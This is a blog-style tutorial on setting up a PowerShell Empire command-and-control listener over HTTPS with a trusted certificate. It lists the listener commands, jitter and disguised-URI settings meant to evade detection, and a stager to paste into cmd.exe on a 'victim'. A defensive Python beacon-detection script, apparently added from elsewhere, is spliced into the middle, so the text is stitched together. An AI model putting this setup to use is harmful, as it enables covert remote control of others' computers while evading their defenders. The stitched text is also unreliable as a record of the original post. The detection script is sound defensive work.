Using PowerShell Empire with a Trusted Certificate

Using a trusted certificate and non-default Empire options will help increase your chances of getting a successful session out of a network. Follow these instructions to get set up.

First, get a signed digital certificate for your server using Let’s Encrypt.

Visit https://certbot.eff.org/ for instructions. The process is also shown here for Apache running on Debian. First, select your server software and operating system, in this case Apache and Debian 8.

Certbot Start Page

Add the Jessie backports repository to your sources.list file (/etc/apt/sources.list in this case) by adding the following line:

deb http://ftp.debian.org/debian jessie-backports main

Then update with this command:

sudo apt-get update

Install the Certbot package:

sudo apt-get install python-certbot-apache -t jessie-backports

Run the apache plugin:

sudo certbot --apache

This will prompt you to answer some questions. Note that you will be required to have a domain name pointing to your server (they are cheap, just buy one) because Let’s Encrypt will not issue certificates for bare IP addresses. Alternatively, you could use a self signed certificate as described here, which would not require a domain name.

Successful Setup via Let’s Encrypt

Now combine cert.pem and privkey.pem into a single file for use with Empire (Thanks Joff):

cd /etc/letsencrypt/live/<your domain>

cat cert.pem privkey.pem > empire.pem

Stop Apache so that ports 80 and 443 are available for your Empire listener:

sudo service apache2 stop

Within Empire, use options similar to the following. The jitter and default profile are changed in an attempt to avoid detection of the session and to increase the chance that you will get a successful session (Thanks Derek):

listeners
set Name 443
set Port 443
set DefaultJitter 0.7
set CertPath /etc/letsencrypt/live/<your domain>/empire.pem
set Host https://<ip of listener>
set DefaultProfile /admin/login.php,/console/dashboard.asp,/news/today.jsp|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0;
execute
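From the defender's side, the profile above is exactly what a proxy-log check can key on. The following Python script is an added example (not from the post or from Empire) that flags a source host which repeatedly requests only the profile's three paths from one destination, using constructed log lines, and reports how much a 0.7 jitter setting spreads the request timing.

```python
import re
from collections import defaultdict
from statistics import mean, pstdev

# Request paths copied from the DefaultProfile line above.
PROFILE_URIS = {"/admin/login.php", "/console/dashboard.asp", "/news/today.jsp"}

# Constructed sample proxy log (not real traffic).
# Fields: epoch_seconds src_ip method dest_host path
SAMPLE_LOG = """\
1000 10.0.0.5 GET c2.example.test /admin/login.php
1005 10.0.0.7 GET www.example.test /index.html
1060 10.0.0.5 POST c2.example.test /news/today.jsp
1100 10.0.0.5 GET c2.example.test /console/dashboard.asp
1150 10.0.0.5 GET www.example.test /news/today.jsp
1195 10.0.0.5 GET c2.example.test /admin/login.php
1200 10.0.0.9 GET c2.example.test /admin/login.php
1225 10.0.0.5 POST c2.example.test /news/today.jsp
1310 10.0.0.5 GET c2.example.test /console/dashboard.asp
"""

LINE_RE = re.compile(r"^(\d+) (\S+) (\S+) (\S+) (\S+)$")


def parse_log(text):
    """Yield (epoch, src, host, path) for each well-formed line; skip junk."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield int(m.group(1)), m.group(2), m.group(4), m.group(5)


def find_profile_beacons(text, min_hits=4):
    """Flag (src, host) pairs whose requests are all profile paths and repeat
    at least min_hits times. The jitter ratio (pstdev / mean gap) shows why
    timing alone is weak once jitter is high: the fixed URI set is the
    stronger signal."""
    seen = defaultdict(list)
    for epoch, src, host, path in parse_log(text):
        seen[(src, host)].append((epoch, path))
    hits = []
    for (src, host), reqs in seen.items():
        if len(reqs) < min_hits or not all(p in PROFILE_URIS for _, p in reqs):
            continue
        times = sorted(t for t, _ in reqs)
        gaps = [b - a for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        hits.append({"src": src, "host": host, "hits": len(reqs),
                     "mean_gap": avg, "jitter_ratio": pstdev(gaps) / avg if avg else 0.0})
    return hits


if __name__ == "__main__":
    for h in find_profile_beacons(SAMPLE_LOG):
        print(h)
```

Only the 10.0.0.5 to c2.example.test pair is flagged; the single benign hit on /news/today.jsp and the two-request host stay below the threshold.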

Note: For hints on scripting the startup of your listener see here.

You now have an HTTPS listener on port 443. You can generate a PowerShell command to run on the victim to establish a session with the following Empire commands:

usestager launcher 443

execute

Using the Empire Launcher

Copy and paste the big long PowerShell command into cmd.exe on your victim to establish the session over HTTPS with a trusted certificate. Woot, Woot!

____

*Shout-out to Joff Thyer and Derek Banks for the ideas and help in getting it going.